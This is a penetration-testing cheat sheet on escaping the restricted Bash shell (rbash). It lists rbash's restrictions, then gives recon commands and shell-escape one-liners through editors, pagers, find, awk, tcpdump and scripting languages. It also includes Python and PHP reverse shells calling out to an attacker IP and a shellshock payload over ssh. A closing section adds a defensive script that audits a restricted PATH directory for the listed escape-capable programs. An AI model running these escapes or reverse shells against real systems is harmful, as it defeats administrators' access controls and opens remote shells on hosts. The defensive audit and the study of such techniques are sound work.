# rbash

`rbash`, or the restricted Bash shell, is a mode of operation of the regular GNU bash (Bourne Again SHell) with several limitations designed to prevent users from bypassing restrictions on their environment that a system administrator has set. When a user is placed in a restricted shell, it limits their ability to perform potentially harmful or undesired actions. Here are some of the key restrictions imposed by `rbash`:
- Changing directories with `cd`: users are not able to change the current directory with the `cd` command. This prevents them from navigating the filesystem freely.
- Setting or unsetting the values of `SHELL`, `PATH`, `ENV`, or `BASH_ENV`: restricting these environment variables prevents users from altering the execution environment in ways that could bypass restrictions.
- Specifying command names containing slashes: users cannot execute commands that contain slashes, which prevents them from specifying exact paths to commands that might not otherwise be in the `PATH`.
- Specifying a filename containing a slash as an argument to the `.` builtin command: this restriction prevents users from sourcing scripts or configuration files from arbitrary locations.
- Specifying a filename containing a slash as an argument to the `-p` option to the `hash` builtin command: this stops users from hashing a pathname directly.
- Importing function definitions from the shell environment at startup: this restriction prevents potentially harmful functions from being automatically imported into the shell environment.
- Parsing the value of `SHELLOPTS` from the shell environment at startup: by ignoring `SHELLOPTS`, `rbash` ensures that users cannot enable shell options that could be used to bypass restrictions.
- Redirecting output using the `>`, `>|`, `<>`, `>&`, `&>`, and `>>` redirection operators: this restriction prevents users from overwriting files.
- Using the `exec` builtin command to replace the shell with another command: this would normally allow a user to start a new, unrestricted shell.
- Adding or deleting builtin commands with the `-f` and `-d` options to the `enable` builtin command: this prevents alterations to the set of commands available to the user.
- Using the `enable` builtin command to enable disabled shell builtins: this restriction keeps the restricted mode intact by not allowing the user to re-enable features that have been disabled.
- Specifying the `-p` option to the `command` builtin command: this option would normally bypass the `PATH` and allow direct execution of a command by file path.
- Turning off restricted mode with `set +r` or `set +o restricted`: this ensures that once in restricted mode, the shell cannot be reverted to an unrestricted state.
## Recon

```bash
# environment
echo $SHELL
echo $PATH
echo $0

# environment variables
export -p

# list binaries
echo /bin/*
echo /usr/bin/*
echo /usr/local/bin/*
echo /usr/local/rbin/*
```
## Bypass

### Text Editor

- vi, vim

  ```
  # (1)
  :set shell=/bin/bash
  :shell
  # (2)
  :!/bin/bash
  ```

- emacs

  ```
  M-x shell
  ```

- nano, pico

  ```
  # .nanorc
  bind ^T execute command "/bin/bash"
  ```

- ed

  ```
  ed
  !'/bin/bash'
  ```
### Pager

- less

  ```
  !/bin/bash
  ```

- more

  ```bash
  TERM= more /etc/profile
  !/bin/sh
  ```

- man

  ```
  !/bin/sh
  ```

- git

  ```bash
  git help config
  !/bin/sh
  ```

- apt

  ```bash
  apt changelog apt
  !/bin/sh
  ```
### Programs

- find

  ```bash
  find / -name foo -exec /bin/sh \;
  ```

- awk

  ```bash
  awk 'BEGIN {system("/bin/sh")}'
  ```

- tee

  ```bash
  echo 'bash -i' | tee script.sh
  ./script.sh
  ```

- nmap

  ```
  nmap --interactive
  nmap> !sh
  ```

- tcpdump

  ```bash
  COMMAND='id'
  TF=$(mktemp)
  echo "$COMMAND" > $TF
  chmod +x $TF
  tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
  ```

- expect

  ```
  expect
  expect> spawn sh
  expect> sh
  ```
### Programming Language

- python

  ```bash
  python3 -c 'import os;os.system("/bin/bash");'
  python3 -c 'import os;os.setuid(0);os.system("/bin/bash");'
  ```

- perl

  ```bash
  perl -e 'system("/bin/bash")'
  ```

- php

  ```bash
  # (1)
  php -r 'exec("sh -i");'
  # (2)
  echo '<?php exec("sh -i"); ?>' > script.php
  php script.php
  ```

- ruby

  ```bash
  ruby -e 'exec "/bin/sh"'
  ```

- lua

  ```bash
  lua -e 'os.execute("/bin/sh")'
  ```
### Reverse Shell

- python

  ```bash
  python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect(("10.10.14.39",1234));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
  ```

- php

  ```bash
  php -r '$sock=fsockopen("LISTENING IP",LISTENING PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
  ```
### From Outside

- ssh

  ```bash
  ssh user@$IP -t "/bin/bash"
  ssh user@$IP -t "/bin/bash --noprofile"
  ```

- shellshock

  ```bash
  ssh user@$IP -t "(){:;}; /bin/bash"
  ```
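Every bypass in the Recon and Bypass sections depends on one of the listed programs being reachable through the restricted user's `PATH`. The script below is an added example, not part of the original page: it audits the directory an rbash account's `PATH` is pinned to (the page's `/usr/local/rbin` is the usual choice) and flags any program the page shows escaping rbash, plus a world-writable directory, since a user who can write to their own `PATH` directory can add or replace binaries. The name list is constructed from this page; the directory name and the `audit_ok` helper are assumptions for the example.

```sh
#!/bin/sh
# Added example (not from the original page): audit a restricted PATH directory.

# Constructed from the programs this page lists as rbash escape routes.
ESCAPE_CAPABLE="vi vim emacs nano pico ed less more man git apt find awk tee \
nmap tcpdump expect python python3 perl php ruby lua"

# Echoes, space separated, every escape-capable program present in the
# directory given as $1 (regular file or symlink, executable or not).
audit_rbin() {
    found=""
    for name in $ESCAPE_CAPABLE; do
        if [ -e "$1/$name" ]; then
            found="$found $name"
        fi
    done
    echo "${found# }"
}

# Echoes the path given as $1 if it is writable by "other" users. The
# directory and the account's startup files should be root-owned and not
# writable by the restricted user, because rbash sets PATH from those files
# before the restrictions take effect.
world_writable() {
    find "$1" -prune -perm -002 -print
}

# Returns 0 when the directory contains no escape-capable program and is
# not world-writable, 1 otherwise. Findings are printed to stdout.
audit_ok() {
    rc=0
    hits=$(audit_rbin "$1")
    if [ -n "$hits" ]; then
        echo "escape-capable programs in $1: $hits"
        rc=1
    fi
    if [ -n "$(world_writable "$1")" ]; then
        echo "$1 is world-writable"
        rc=1
    fi
    return $rc
}

# Usage (directory is an assumption): audit_ok /usr/local/rbin
```

Run it against the directory named in the restricted account's `.bash_profile`; any hit means the listed bypass for that program applies, and the binary should be removed from the directory or replaced by a wrapper that does not expose a shell escape.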